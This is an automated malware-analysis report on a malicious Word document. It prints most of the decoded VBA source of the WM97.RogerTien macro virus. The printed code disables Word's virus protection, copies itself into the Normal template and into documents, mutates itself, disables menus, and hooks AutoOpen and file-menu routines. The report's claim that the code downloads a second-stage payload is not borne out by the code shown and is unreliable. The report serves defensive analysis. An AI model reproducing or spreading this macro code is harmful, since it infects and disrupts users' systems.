Verdict: MALICIOUS
Risk Score: 200

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains legacy WordBasic macros, specifically an AutoOpen macro, which is a strong indicator of malicious intent. The script attempts to disable macro security features and export a file named 'RogerTien.sys' to the C:\ drive, likely to download and execute a second-stage payload. The ClamAV detection further confirms its malicious nature.
Heuristics (4)
- ClamAV: Win.Trojan.Pivis-2 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.Pivis-2
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4681 bytes |

SHA-256: 1964cf9809fd7884e06528b4b3f63c1d0191253299ff7b586ac4b3f70eabb5dc

Detection
- ClamAV: Doc.Trojan.Agnes-4
- Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Attribute VB_Name = "RogerTien"
Sub AzCpMx5511()
' -= [WM97.RogerTien] =-
WordBasic.DisableAutoMacros 0
ActiveDocument.ReadOnlyRecommended = False
With Application
.EnableCancelKey = wdCancelDisabled
.DisplayAlerts = wdAlertsNone
End With
With Options
.ConfirmConversions = False
s.VirusProtection = False
End With
Set Current = MacroContainer
For Grow = 1 To 20
Number = Current.VBProject.VBComponents("RogerTien").CodeModule.ProcCountLines("AzCpMx5511", vbext_pk_Proc)
RandomLine = Int(Rnd() * Number + 1)
RemarkLength = Int(Rnd() * 40 + 1)
For Length = 1 To RemarkLength
Remark = Remark + Chr$(Int((90 - 65 + 1) * Rnd + 65))
Next Length
Current.VBProject.VBComponents("RogerTien").CodeModule.InsertLines RandomLine, vbTab & "Rem " & Remark
Remark = ""
Next Grow
Call OfKoPl759
End Sub
Sub OfKoPl759()
On Error Resume Next
Application.CommandBars("Edit").Enabled = False
Application.CommandBars("Insert").Enabled = False
Application.CommandBars("Format").Enabled = False
End Sub
Sub Th1874()
On Error Resume Next
Application.EnableCancelKey = wdCancelDisabled
With Options
.SaveNormalPrompt = False
.VirusProtection = False
.ConfirmConversions = False
End With
Application.VBE.ActiveVBProject.VBComponents("RogerTien").Export "C:\RogerTien.sys"
With Dialogs(wdDialogFileSummaryInfo)
.Author = Chr(74) + Chr(97) + Chr(99) + Chr(107) + Chr(32) + Chr(84) + Chr(119) + Chr(111) + Chr(102) + Chr(108) + Chr(111) + Chr(119) + Chr(101) + Chr(114) + Chr(32) + Chr(45) + Chr(61) + Chr(91) + Chr(76) + Chr(105) + Chr(110) + Chr(101) + Chr(90) + Chr(101) + Chr(114) + Chr(216) + Chr(32) + Chr(86) + Chr(120) + Chr(32) + Chr(84) + Chr(101) + Chr(97) + Chr(109) + Chr(93) + Chr(61) + Chr(45)
.Comments = "WM97.RogerTien" & Chr(32) + Chr(98) + Chr(121) + Chr(32) + Chr(76) + Chr(105) + Chr(77) + Chr(69) + Chr(32) + Chr(49) + Chr(46) + Chr(111)
.Keywords = "LiME ID: 12094-Th-18745511-Hr.W"
.Execute
End With
For x = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(x).Name = "RogerTien" Then BmPkMr3950RnEuGe1874 = True
Next x
For y = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(y).Name = "RogerTien" Then CfAnHh759AzCpMx5511 = True
Next y
If BmPkMr3950RnEuGe1874 = True And CfAnHh759AzCpMx5511 = False Then Set NnPjVy8904OfKoPl148 = ActiveDocument.VBProject
If BmPkMr3950RnEuGe1874 = False And CfAnHh759AzCpMx5511 = True Then Set NnPjVy8904OfKoPl148 = NormalTemplate.VBProject
If BmPkMr3950RnEuGe1874 = True And CfAnHh759AzCpMx5511 = True Then GoTo Ende_
NnPjVy8904OfKoPl148.VBComponents.Import "C:\RogerTien.sys"
If CfAnHh759AzCpMx5511 = False Then ActiveDocument.SaveAs (WordBasic.[FileName$]()), FileFormat:=wdFormatDocument
If BmPkMr3950RnEuGe1874 = False Then NormalTemplate.Save
Ende_:
Call AzCpMx5511
End Sub
Sub AutoOpen()
On Error Resume Next
Call Th1874
Call AzCpMx5511
End Sub
Sub AutoExit()
On Error Resume Next
Call Th1874
Call AzCpMx5511
End Sub
Sub AutoNew()
On Error Resume Next
Call Th1874
Call AzCpMx5511
End Sub
Sub AutoExec()
On Error Resume Next
Call Th1874
Call AzCpMx5511
End Sub
Sub DateiNeu()
On Error Resume Next
Dialogs(wdDialogFileNew).Show
Call Th1874
Call AzCpMx5511
End Sub
Sub DateiOffnen()
On Error Resume Next
Dialogs(wdDialogFileOpen).Show
Call Th1874
Call AzCpMx5511
End Sub
Sub DateiSchliesen()
On Error Resume Next
Call Th1874
Call AzCpMx5511
WordBasic.FileClose dlg
End Sub
Sub DateiSpeichern()
On Error Resume Next
Call Th1874
Call AzCpMx5511
ActiveDocument.Save
End Sub
Sub DateiSpeichernUnter()
On Error Resume Next
Call Th1874
Call AzCpMx5511
Dialogs(wdDialogFileSaveAs).Show
End Sub
Sub DateiDrucken()
On Error Resume Next
Call Th1874
Call AzCpMx5511
Dialogs(wdDialogFilePrint).Show
End Sub
... (truncated)